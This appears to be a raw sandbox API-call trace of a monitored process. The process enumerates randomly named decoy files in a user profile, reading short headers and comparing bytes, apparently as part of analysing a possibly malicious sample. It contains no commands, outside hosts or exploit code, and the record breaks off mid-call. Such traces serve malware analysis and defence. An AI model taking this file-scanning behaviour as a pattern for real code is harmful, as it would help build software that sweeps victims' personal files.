[0085.799] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/7tLU060TeHFmaN8.jpg" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/7tlu060tehfman8.jpg") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/7tlu060tehfman8.jpg" [0085.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/7tlu060tehfman8.jpg") returned 63 [0085.799] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.799] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.799] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.799] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/Z2LyObAsS%20shWl/XCrdCV/lJ3nRaTt.jpg" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/lj3nratt.jpg") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/lj3nratt.jpg" [0085.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/lj3nratt.jpg") returned 90 [0085.799] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.799] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.799] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.799] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/I4z-zBSF9hnTkBaKIP/V27YtHjhtm5zniry.ots" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/v27ythjhtm5zniry.ots") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/v27ythjhtm5zniry.ots" [0085.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/v27ythjhtm5zniry.ots") returned 104 [0085.799] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.799] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.799] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.799] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/E1-SZDw/YSBwVDgi513gVe8gdts0.swf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ysbwvdgi513gve8gdts0.swf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ysbwvdgi513gve8gdts0.swf" [0085.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ysbwvdgi513gve8gdts0.swf") returned 75 [0085.799] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.799] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.799] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.799] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/E1-SZDw/Ed35v.mkv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ed35v.mkv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ed35v.mkv" [0085.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ed35v.mkv") returned 60 [0085.800] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.800] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.800] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.800] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/l2ikFr.xlsx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/l2ikfr.xlsx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/l2ikfr.xlsx" [0085.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/l2ikfr.xlsx") returned 76 [0085.800] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.800] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.800] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.800] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/VtVzhjU6H4lQXexI9eF9.jpg" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vtvzhju6h4lqxexi9ef9.jpg") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vtvzhju6h4lqxexi9ef9.jpg" [0085.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vtvzhju6h4lqxexi9ef9.jpg") returned 68 [0085.800] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.800] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.800] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.800] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/RA1qXhAgR06tsse5SRl.xlsx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/ra1qxhagr06tsse5srl.xlsx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/ra1qxhagr06tsse5srl.xlsx" [0085.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/ra1qxhagr06tsse5srl.xlsx") returned 70 [0085.800] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.800] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.800] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.801] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/E1-SZDw/0swDP%200JTayGezoJn.swf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/0swdp%200jtaygezojn.swf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/0swdp%200jtaygezojn.swf" [0085.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/0swdp%200jtaygezojn.swf") returned 74 [0085.801] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.801] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.801] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x180, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x180, lpOverlapped=0x0) returned 1 [0085.801] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/Z2LyObAsS%20shWl/TpxyvhqitSjWoNKMm/yWZ6bCkDGKeaDV/MSEz/nJ1uA7QN.png" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/nj1ua7qn.png") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/nj1ua7qn.png" [0085.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/nj1ua7qn.png") returned 121 [0085.801] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.801] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.801] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.801] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/glvVvpVEB1b9FqLag7.ots" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/glvvvpveb1b9fqlag7.ots") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/glvvvpveb1b9fqlag7.ots" [0085.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/glvvvpveb1b9fqlag7.ots") returned 68 [0085.801] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.801] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.801] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.801] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/UeGk7xbr6-Krprckyd.docx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/uegk7xbr6-krprckyd.docx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/uegk7xbr6-krprckyd.docx" [0085.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/uegk7xbr6-krprckyd.docx") returned 69 [0085.801] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.802] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.802] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.802] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/Z2LyObAsS%20shWl/TpxyvhqitSjWoNKMm/kiPMxd08JtyRa4.jpg" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/kipmxd08jtyra4.jpg") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/kipmxd08jtyra4.jpg" [0085.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/kipmxd08jtyra4.jpg") returned 107 [0085.802] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.802] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.802] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.802] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/Ix0knq7j3.rtf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/ix0knq7j3.rtf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/ix0knq7j3.rtf" [0085.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/ix0knq7j3.rtf") returned 78 [0085.802] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.802] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.802] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.802] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/JU_DZyRs7JfE4.pdf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/ju_dzyrs7jfe4.pdf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/ju_dzyrs7jfe4.pdf" [0085.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/ju_dzyrs7jfe4.pdf") returned 63 [0085.802] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.802] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.802] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.802] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/-53xiEmeE-e.docx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/-53xiemee-e.docx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/-53xiemee-e.docx" [0085.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/-53xiemee-e.docx") returned 62 [0085.802] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.802] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.803] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.803] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/kfHUhsL.rtf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/kfhuhsl.rtf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/kfhuhsl.rtf" [0085.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/kfhuhsl.rtf") returned 63 [0085.803] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.803] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.803] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.803] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/I4z-zBSF9hnTkBaKIP/1xFM.xlsx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/1xfm.xlsx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/1xfm.xlsx" [0085.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/1xfm.xlsx") returned 93 [0085.803] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.803] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.803] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.803] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/2OWth4htJ.pdf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/2owth4htj.pdf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/2owth4htj.pdf" [0085.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/2owth4htj.pdf") returned 65 [0085.803] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.803] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.803] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.803] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/kaPjDJpM0.gif" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/kapjdjpm0.gif") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/kapjdjpm0.gif" [0085.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/kapjdjpm0.gif") returned 65 [0085.804] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.804] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.804] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.804] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/qah0Uzv-.ppt" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/qah0uzv-.ppt") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/qah0uzv-.ppt" [0085.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/qah0uzv-.ppt") returned 64 [0085.804] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.804] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.804] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.804] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/rCa29oK1R73tia22zN.mkv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/rca29ok1r73tia22zn.mkv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/rca29ok1r73tia22zn.mkv" [0085.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/rca29ok1r73tia22zn.mkv") returned 65 [0085.804] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.804] _memicmp (_Buf1=0x28677c, 